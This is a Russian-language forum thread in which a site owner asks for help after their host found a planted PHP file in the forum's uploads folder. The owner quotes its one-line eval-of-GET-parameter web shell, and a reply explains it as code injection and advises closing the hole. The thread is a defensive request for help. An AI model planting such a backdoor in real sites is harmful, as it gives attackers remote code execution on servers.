Перейти к контенту
  • 0

фзлом форума - eval(stripslashes


ART[FL]

Вопрос

Здравствуйте

сегодня получил от хостера письмо с сылкой на подозрительный файл на площадке

ссылка на сайт/www/forums/uploads/1.php

 

в котором был ниже приведённый код

 

<?eval(stripslashes($_GET[a]));?>

 

как предотвратить появление сего взлома в будущем? что этим смог добиться взломщик, ведь всё на форуме работает

Как залатать дыру?

 

в админке пишет версия форума 2.3.5, хотя помню что устанавливал последний патч 2.3.6, но он неотображается в панели

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

  • 0

как предотвратить появление сего взлома в будущем?

 

Узнать каким образом посторонний код попал на форум, и закрыть уязвимость. Учитывая то, что вторая линейка давно не поддерживается, вам предстоит увлекательное занятие.

 

что этим смог добиться взломщик

 

Php code injection, со всеми вытекающими

 

ведь всё на форуме работает

 

А с чего на форуме что-то не должно работать? Во первых, сам этот код напрямую с форумом не связан, а во вторых цель взломщика наоборот остаться как можно незаметнее в системе, и "неработоспособность" у него входит в последнюю очередь.

 

но он неотображается в панели

 

В какой панели, и что там должно отображаться?

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.